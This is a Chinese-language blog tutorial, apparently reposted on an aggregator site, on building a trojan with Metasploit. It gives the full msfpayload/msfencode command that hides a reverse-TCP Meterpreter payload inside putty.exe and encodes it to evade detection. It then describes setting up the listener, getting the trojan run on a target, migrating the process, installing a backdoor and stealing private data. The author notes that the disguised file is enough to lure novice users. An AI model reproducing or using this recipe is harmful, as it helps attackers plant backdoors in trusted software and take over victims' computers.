木馬程式的製作

文章推薦指數: 80 %
投票人數:10人

0x0:想必大家都聽說過計算機病毒或者木馬吧,看著電影裡面的黑客敲幾下鍵盤就能控制你的系統,竊取你的隱私資料,執行任意命令,很炫酷吧, ... 程式語言前端開發IOS開發Android開發雲端運算人工智慧伺服器搜尋資料庫軟體開發工具木馬程式的製作2018.08.03程式語言挖礦木馬程式,木馬滲透測試網路安全,木馬程式的編寫,木馬程式視窗,滲透相關,簡單的木馬程式,編寫木馬程式HOME程式語言木馬程式的製作Advertisement0x0:想必大家都聽說過計算機病毒或者木馬吧,看著電影裡面的黑客敲幾下鍵盤就能控制你的系統,竊取你的隱私資料,執行任意命令,很炫酷吧,其實這種技術不難實現,接下來我就帶領大家來玩一玩木馬的製作.實驗環境:Win7SP1Backtrack5.使用工具有:msfpayloadmsfencode. 0x01:使用msfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.30.101 LPORT=443R|msfencode-ex86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/putty.exe -o/root/Desktop/putty_backdoor.exe圖1-1.命令解釋:Msfpayload後面是一個具有回連功能攻擊載荷.LHOST設定為自己的IP,LPORT設定為自己的埠,用於回連.R(Raw)是輸出為二進位制格式,|代表管道,將二進位制資料通過管道給msfencode進行編碼.e選擇編碼的模組,c表示編碼的次數,這裡是5次.t表示生成的格式,這裡為exe.x表示選擇的原始檔,o是輸出加入PAYLOAD並進行過編碼的木馬檔案. 0x02:生成的木馬檔案如圖1-2. 圖1-2.0x03:進入MSF後,我們開啟監聽模組. 圖1-3.選擇好PAYLOAD後設定目標回連的IP和埠即可. 圖1-4.0x04:把木馬檔案複製到目標機器上並執行. 圖1-5.0x05:檢視監聽狀態,會發現有一個Meterpreter回連會話,這是你就可以使用migrate遷移程序,然後安裝後門程式,再竊取隱私資訊… 圖1-6. End:這次滲透測試還是很簡單的,蛋疼的是看《Metasploit滲透測試魔鬼訓練營》的木馬程式製作時一直不成功,研究了幾天後偶然在國外的技術文章中收穫了點靈感————不使用-K引數,雖然生成的木馬程式不能擁有源程式的完整功能,但圖示和程式大小沒有改變,足夠誘惑小白使用者了,雖然msfencode在2015年就宣佈停止了,但我還是想把這塊硬骨頭啃爛,如果各位同道能找到解決方法,請聯絡我,謝謝! 圖1-7報錯問題.  Youcanfindmebyqq:1762458611Advertisement写评论取消回覆很抱歉,必須登入網站才能發佈留言。

近期文章Spark入門(一)用SparkShell初嘗Spark滋味2019.12.08Spark入門(二)如何用Idea運行我們的Spark項目2019.12.08Spark入門(三)Spark經典的單詞統計2019.12.08Spark入門(四)Spark的map、flatMap、mapToPair2019.12.08Spark入門(五)Spark的reduce和reduceByKey2019.12.08Spark入門(六)Spark的combineByKey、sortBykey2019.12.08Spark入門(七)Spark的intersection、subtract、union和distinct2019.12.08Spark實戰尋找5億次訪問中,訪問次數最多的人2019.12.08Spark實戰搭建我們的Spark分佈式架構2019.12.08【機器學習】深度學習開發環境搭建2019.12.08AdvertisementAdvertisement



請為這篇文章評分?